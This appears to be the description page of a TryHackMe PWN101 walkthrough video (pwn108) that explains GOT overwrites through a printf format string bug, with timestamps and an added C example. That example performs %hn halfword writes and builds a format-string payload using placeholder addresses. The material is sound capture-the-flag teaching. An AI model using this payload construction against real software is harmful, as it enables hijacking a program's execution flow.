GOT overwrite with Format String - pwn108 - PWN101 | TryHackMe

Video description

In this video we see, step by step, how to overwrite GOT (Global Offset Table) entries by abusing a format string vulnerability, and thereby hijack the program's execution flow. We look in detail at how to write to memory with the %n format specifier of the printf family, which stores the number of characters printed so far into the int that the corresponding argument points to, and at how to write 4 or fewer bytes of the value we want at the address we choose (the h length sub-specifier, %hn, limits a single write to 2 bytes). We also cover printf's bad characters, which dictate how the payload must be arranged: a NUL byte inside a target address ends the format string, so the addresses have to come after the specifiers. Finally, we see how to debug the payload with radare2 (r2) by writing it to a file and having r2 feed it to the program.
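
The two pieces of the technique described above, the %hn write arithmetic and the layout of the payload bytes, as an added example that is not the video's code and not the pwn108 binary. The GOT slot is stood in for by an ordinary variable, the target addresses are passed as explicit printf arguments so that the write arithmetic is what gets exercised, and the sample payload uses a hypothetical input position (6), GOT slot (0x404018) and win address (0x401196) rather than values from the challenge. It assumes glibc on a little-endian machine (x86/x86-64); glibc's fortified printf refuses %n with a format string in writable memory, which is why _FORTIFY_SOURCE is undefined at the top.

```c
/* Added example (not the video's code): halfword writes with %hn, as used for
 * a GOT overwrite. The slot is a plain variable; addresses, positions and the
 * win address in the sample payload are placeholders, not pwn108's values. */
#undef _FORTIFY_SOURCE   /* fortified printf aborts on %n with a writable format string */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define MAX_HALF 4                        /* an 8-byte slot takes four 2-byte writes */

typedef struct { unsigned pad; int idx; } halfword_write;

/* Split `value` into nbytes/2 halfwords and decide the order and padding of each
 * write. %hn stores the low 16 bits of the running character count, so the padding
 * before a write is (wanted - count_so_far) mod 2^16; the count only grows, so
 * writing the halfwords in ascending order keeps the output short.
 * Returns the number of writes, or -1 for an unsupported size. */
int plan_halfwords(uint64_t value, int nbytes, halfword_write plan[MAX_HALF])
{
    if (nbytes != 2 && nbytes != 4 && nbytes != 8) return -1;
    int n = nbytes / 2, order[MAX_HALF];
    uint16_t want[MAX_HALF];
    for (int i = 0; i < n; i++) { want[i] = (uint16_t)(value >> (16 * i)); order[i] = i; }
    for (int i = 1; i < n; i++)                          /* insertion sort, ascending by value */
        for (int j = i; j > 0 && want[order[j - 1]] > want[order[j]]; j--) {
            int t = order[j]; order[j] = order[j - 1]; order[j - 1] = t;
        }
    unsigned count = 0;
    for (int k = 0; k < n; k++) {
        unsigned pad = (want[order[k]] - count) & 0xffff;
        if (pad == 0) pad = 0x10000;   /* a width of 0 still prints one char; wrap fully instead */
        count += pad;
        plan[k].pad = pad;
        plan[k].idx = order[k];
    }
    return n;
}

/* Perform the writes for real: "%1$<pad>c%<2+idx>$hn..." with the halfword
 * pointers as positional arguments 2..5. Output goes to a heap buffer so the
 * terminal is not flooded. Returns the number of writes, -1 on error. */
int write_halfwords(void *slot, uint64_t value, int nbytes)
{
    halfword_write plan[MAX_HALF];
    int n = plan_halfwords(value, nbytes, plan);
    if (n < 0) return -1;
    char fmt[128]; size_t len = 0, total = 0;
    for (int k = 0; k < n; k++) {
        len += snprintf(fmt + len, sizeof fmt - len, "%%1$%uc%%%d$hn", plan[k].pad, 2 + plan[k].idx);
        total += plan[k].pad;
    }
    short *p[MAX_HALF] = { 0 };
    for (int i = 0; i < n; i++) p[i] = (short *)((unsigned char *)slot + 2 * i);
    char *out = malloc(total + 1);
    if (!out) return -1;
    snprintf(out, total + 1, fmt, 'A', p[0], p[1], p[2], p[3]);  /* arg 1 pads, 2..5 are pointers */
    free(out);
    return n;
}

/* Overwrite `nbytes` of a slot that starts as `initial`; returns the slot afterwards. */
uint64_t demo_write(uint64_t initial, uint64_t value, int nbytes)
{
    uint64_t slot = initial;
    if (write_halfwords(&slot, value, nbytes) < 0) return initial;
    return slot;
}

/* The real scenario: the addresses travel inside the input buffer. Specifiers
 * first, filler up to a pointer boundary, addresses last, so their NUL bytes come
 * after everything printf parses. `input_pos` is the argument position at which
 * the start of the buffer shows up on the stack (the %k$p test from the video);
 * "%<pad>c%<pos>$hn" is the shape used in practice on glibc.
 * Returns the payload length, or 0 if `out` is too small. */
size_t build_payload(unsigned char *out, size_t cap, int input_pos, int ptrsize,
                     uint64_t slot_addr, uint64_t value, int nbytes)
{
    halfword_write plan[MAX_HALF];
    int n = plan_halfwords(value, nbytes, plan);
    if (n < 0 || (ptrsize != 4 && ptrsize != 8)) return 0;
    char spec[128]; size_t len = 0; int slots = 0;
    do {   /* positions depend on the chunk length and vice versa: grow the slot budget until it fits */
        slots++; len = 0;
        for (int k = 0; k < n; k++)
            len += snprintf(spec + len, sizeof spec - len, "%%%uc%%%d$hn",
                            plan[k].pad, input_pos + slots + plan[k].idx);
    } while (len > (size_t)slots * ptrsize);
    size_t head = (size_t)slots * ptrsize, total = head + (size_t)n * ptrsize;
    if (total > cap) return 0;
    memset(out, 'A', head);
    memcpy(out, spec, len);
    for (int i = 0; i < n; i++) {                       /* address of halfword i, little-endian */
        uint64_t a = slot_addr + 2 * (uint64_t)i;
        for (int b = 0; b < ptrsize; b++) out[head + (size_t)i * ptrsize + b] = (unsigned char)(a >> (8 * b));
    }
    return total;
}

/* Constructed sample: 64-bit, buffer at position 6, placeholder GOT slot 0x404018,
 * placeholder win function 0x401196, written as one 4-byte (two %hn) overwrite. */
unsigned char g_payload[128];
size_t demo_payload(void)
{
    return build_payload(g_payload, sizeof g_payload, 6, 8, 0x404018, 0x401196, 4);
}

int main(void)
{
    printf("slot after %%hn writes: 0x%08llx\n", (unsigned long long)demo_write(0, 0x08049234u, 4));
    size_t len = demo_payload();
    printf("payload: %zu bytes, head: %.*s\n", len, (int)(len - 16), g_payload);
    return 0;
}
```

The "4 or fewer bytes" case from the video is demo_write with nbytes 4 (two %hn writes) or 2 (a single %hn); pass 8 to rewrite a whole 64-bit slot. build_payload only lays out bytes and does not execute them; feed its output to the target with a tool that accepts NUL bytes, since the high bytes of each address are zero.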

GOT and PLT: Global Offset Table (GOT) and Procedu...
Exploiting Format String tutorial: Exploiting Format String vulnerabilit...

Binary Exploitation PWN101 series: Binary Exploitation PWN101

00:00 - Intro
00:40 - Checking the binary
01:56 - Executing the binary
02:16 - Trying to break the binary
02:35 - Testing for format string
02:50 - Spotting the vulnerability
03:33 - Disassembling the binary
03:56 - Analyzing the code
05:49 - Spotting the format string
06:55 - ret2win-like function
08:02 - Recap
08:39 - The %n format specifier
10:15 - The GOT and the PLT
11:06 - Considerations before exploitation
11:25 - Partial RELRO
12:11 - Permissions of the GOT section
12:31 - GOT entry to overwrite
14:03 - Preparing the exploit
14:12 - Finding the position of the input
15:50 - Starting the payload
16:09 - %n and positional argument
17:05 - How to write with %n
18:20 - Padding to write the desired value
19:17 - Writing with %n
19:39 - Bad chars for printf
22:11 - Rearranging the payload
22:54 - Adapting the payload
24:55 - Debugging/testing the payload
25:55 - Debugging with radare2 (r2)
27:05 - %n wrote only 4 bytes
27:49 - Writing more than just 4 bytes
28:23 - Splitting the writes
29:50 - Writing just 2 bytes
30:00 - The 'h' length sub-specifier
30:27 - Final payload
32:19 - Adjusting the final payload
33:49 - Executing the exploit
34:12 - Exploiting locally
34:37 - Exploiting remotely
35:15 - Reading the flag
35:21 - Outro[*]

Exploit code, not people.
Twitter: @Razvieu
*Outro track: Etsu - Selcouth
GG
